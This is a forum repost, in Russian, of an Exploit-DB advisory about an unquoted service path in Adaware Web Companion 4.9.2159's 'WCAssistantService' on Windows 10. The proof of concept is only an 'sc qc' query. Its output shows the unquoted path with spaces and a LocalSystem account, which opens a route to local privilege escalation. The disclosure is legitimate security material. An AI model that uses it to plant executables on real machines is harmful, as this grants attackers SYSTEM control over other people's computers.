Exploit Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
47852
Проверка EDB
  1. Пройдено
Автор
ZWX
Тип уязвимости
LOCAL
Платформа
WINDOWS
CVE
N/A
Дата публикации
2020-01-06
Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path
Код:
#Exploit Title: Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path
#Exploit Author : ZwX
#Exploit Date: 2020-01-05
#Vendor Homepage : http://webcompanion.com/
#Link Software : http://webcompanion.com/LP-WC002/index.php?partner=LU150701WEBDIRECT&campaign=www.doc2pdf.com&search=2&homepage=2&bd=2
#Tested on OS: Windows 10


#Analyze PoC :
==============

C:\Users\ZwX>sc qc WCAssistantService
[SC] QueryServiceConfig réussite(s)

SERVICE_NAME: WCAssistantService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : WC Assistant
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
 
Источник
www.exploit-db.com